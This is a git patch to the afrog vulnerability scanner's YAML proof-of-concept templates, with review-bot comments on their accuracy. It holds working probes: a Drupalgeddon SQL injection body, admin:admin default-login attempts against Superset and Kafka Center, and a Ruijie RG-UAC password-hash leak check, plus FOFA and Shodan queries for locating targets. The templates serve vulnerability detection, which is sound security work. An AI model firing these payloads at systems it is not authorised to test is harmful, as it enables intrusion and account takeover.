From 004321dbaff6880da105a6a7202c54d0cbcf0197 Mon Sep 17 00:00:00 2001 From: zan8in Date: Wed, 6 Apr 2022 22:37:38 +0800 Subject: [PATCH] cve-2021-44451 && kafaka-default-pwd --- afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml | 8 +++-- afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml | 2 ++ afrog-pocs/CVE/2014/CVE-2014-3704.yaml | 6 ++-- afrog-pocs/CVE/2021/CVE-2021-44451.yaml | 35 +++++++++++++++++++ .../kafka-center-default-password.yaml | 20 +++++++++++ .../unreviewed => pocs}/CVE-2022-22965.yaml | 0 6 files changed, 66 insertions(+), 5 deletions(-) create mode 100644 afrog-pocs/CVE/2021/CVE-2021-44451.yaml create mode 100644 afrog-pocs/default-pwd/kafka-center-default-password.yaml rename {afrog-pocs/unreviewed => pocs}/CVE-2022-22965.yaml (100%) diff --git a/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml b/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml index b2b79a48..ed54d34f 100644 --- a/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml +++ b/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml @@ -1,14 +1,16 @@ id: CNVD-2021-14536 info: - name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞 - author: jweny(https://github.com/jweny) + name: Ruijie RG-UAC Information Disclosure + author: jweny(https://github.com/jweny) daffainfo severity: high + description: | + fofa-query: 'title="RG-UAC登录页面"' rules: r0: request: method: GET path: /login.php - expression: response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) + expression: response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) expression: r0() diff --git a/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml b/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml index 7999a483..04a31979 100644 --- a/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml +++ b/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml 
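Review bot: Dropping `response.body.bcontains(b"RG-UAC登录页面")` from the `r0` expression leaves only `get_dkey_passwd` plus a 32-hex `"password"` JSON field as evidence, so any unrelated page that embeds an MD5-looking password value next to that string now matches; if the title check was removed because it varies across firmware builds, a looser product fingerprint such as `response.body.bcontains(b"RG-UAC")` would keep precision without depending on the exact title. The new `description:` block contains only the FOFA query and no longer says what the finding is, whereas the removed Chinese name did; suggest `description: |` followed by `Ruijie RG-UAC unified internet-behaviour management/audit system returns an account password (32 hex chars, likely an MD5 hash) in the unauthenticated /login.php response; matched on get_dkey_passwd plus a "password":"<hex>" field.` with the FOFA query kept on the following line. Since indentation is collapsed in this view I cannot verify it, but `fofa-query:` must sit inside the `|` block scalar or YAML will parse it as a sibling key of `description`.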
@@ -4,6 +4,8 @@ info: name: ShopXO File Read author: Print1n(http://print1n.top) severity: high + reference: + - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog rules: Linux0: diff --git a/afrog-pocs/CVE/2014/CVE-2014-3704.yaml b/afrog-pocs/CVE/2014/CVE-2014-3704.yaml index 15315c68..0863f44b 100644 --- a/afrog-pocs/CVE/2014/CVE-2014-3704.yaml +++ b/afrog-pocs/CVE/2014/CVE-2014-3704.yaml @@ -5,12 +5,14 @@ info: author: unkown severity: high +set: + rand: randomInt(200000000, 210000000) rules: r0: request: method: POST path: /?q=node&destination=node - body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a - expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") + body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select md5({{rand}}))),0)%23]=bob&name[0]=a + expression: response.status == 500 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) expression: r0() diff --git a/afrog-pocs/CVE/2021/CVE-2021-44451.yaml b/afrog-pocs/CVE/2021/CVE-2021-44451.yaml new file mode 100644 index 00000000..a8473402 --- /dev/null +++ b/afrog-pocs/CVE/2021/CVE-2021-44451.yaml 
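Review bot: The `31` in `substr(md5(string(rand)), 0, 31)` is load-bearing and undocumented: MySQL truncates the XPath error text raised by `updatexml` to 32 characters and the leading `0xa` consumes one of them, so only the first 31 hex digits of the MD5 can ever appear in the response, and a reader tuning this later will not know why 32 would silently break the match. Suggest a `description:` under `info:` (that block starts above the hunk) along the lines of `Drupal 7 before 7.32 ("Drupalgeddon") SQL injection through the name[] array of the login form; the probe forces an XPath error carrying md5(<random int>) and matches its first 31 hex chars because MySQL truncates updatexml error text to 32 characters.` Replacing the fixed `md5(666)` with a per-run random marker is the right call, as it defeats canned-response honeypots and guarantees the marker cannot already be present in the page; dropping the `PDOException` check is acceptable since status 500 plus the random marker is specific, with the caveat that a target hiding database errors now fails closed (false negative), not open.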
@@ -0,0 +1,35 @@ +id: CVE-2021-44451 + +info: + name: Apache Superset Default Password + author: dhiyaneshDK + severity: high + description: | + Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. + Users should upgrade to Apache Superset 1.4.0 or higher. + Fofa: app="APACHE-Superset" + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 + +set: + refererUrl: request.url +rules: + r0: + request: + method: GET + path: /login/ + expression: response.status == 200 + output: + search: '"value=\"(?P.*?)\">".bsubmatch(response.body)' + cs_token: search["cs_token"] + r1: + request: + method: POST + path: /login/ + headers: + Referer: "{{refererUrl}}/admin/airflow/login" + body: | + csrf_token={{cs_token}}&username=admin&password=admin + expression: response.status == 302 && response.body.bcontains(b'Redirecting...') && response.body.bcontains(b'

Redirecting...

') && response.body.bcontains(b'') && response.raw_header.bcontains(b'session') +expression: r0() && r1() \ No newline at end of file diff --git a/afrog-pocs/default-pwd/kafka-center-default-password.yaml b/afrog-pocs/default-pwd/kafka-center-default-password.yaml new file mode 100644 index 00000000..79c6aefa --- /dev/null +++ b/afrog-pocs/default-pwd/kafka-center-default-password.yaml @@ -0,0 +1,20 @@ +id: kafka-center-default-password + +info: + name: Apache Kafka Center Default Password + author: dhiyaneshDK + severity: high + description: | + shodan-query: http.title:"Kafka Center" + +rules: + r0: + request: + method: POST + path: /login/system + headers: + Content-Type: application/json + body: | + {"name":"admin","password":"admin","checkbox":false} + expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"') +expression: r0() \ No newline at end of file diff --git a/afrog-pocs/unreviewed/CVE-2022-22965.yaml b/pocs/CVE-2022-22965.yaml similarity index 100% rename from afrog-pocs/unreviewed/CVE-2022-22965.yaml rename to pocs/CVE-2022-22965.yaml
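Review bot: The `r1` expression cannot distinguish a successful login from a rejected one: Flask-AppBuilder's `AuthDBView.login`, which Superset uses, answers a wrong password with a flashed warning and a 302 back to `/login/`, and Flask emits a `session` cookie to carry that flash, so `status == 302 && 'Redirecting...' && 'session'` is, as far as I can tell, true for every reachable Superset instance; add a Location check such as `&& !response.raw_header.bcontains(b'Location: /login/')` (a real success redirects to the index, typically `/superset/welcome/`). Separately, what this POC actually proves is `admin:admin` default credentials, not CVE-2021-44451 (an authenticated database-password disclosure fixed in 1.4.0, as the description itself says), so a hit on a patched 1.4.x instance would be reported under the wrong identifier; it belongs beside `kafka-center-default-password.yaml` as `apache-superset-default-password`, with the CVE mentioned only as the impact of gaining an authenticated session. The `Referer` value `{{refererUrl}}/admin/airflow/login` is an Airflow path, presumably carried over from an Airflow template; Superset does not require it, so drop it or point it at `/login/`. The CSRF extraction regex appears here as `value=\"(?P.*?)\">`, which looks like a rendering artifact of `(?P<cs_token>.*?)`; either way it captures the first `value=\"` on the page rather than the CSRF field, so anchor it on the hidden input, e.g. `'"name=\"csrf_token\" type=\"hidden\" value=\"(?P<cs_token>[^\"]+)\"".bsubmatch(response.body)'`.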
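Review bot: The success test `"code":200` plus `"name":"admin"` can match a rejected login if the API echoes the submitted user name back, and `"code":200` on its own is how many such JSON backends report any handled request, so unless a captured failed-login response shows otherwise the expression should match on something only a successful login returns (a token or the returned user object's role field) rather than the name that was sent. "Apache Kafka Center" is also a misnomer: Kafka Center is, as far as I can tell, the third-party xaecbd/KafkaCenter project and not an Apache product, so `name:` should read `Kafka Center Default Password`, and the `description:` should state what is tested (`admin:admin` against `/login/system`) and cite the project, e.g. `reference: - https://github.com/xaecbd/KafkaCenter`, since the Shodan query alone does not describe the finding.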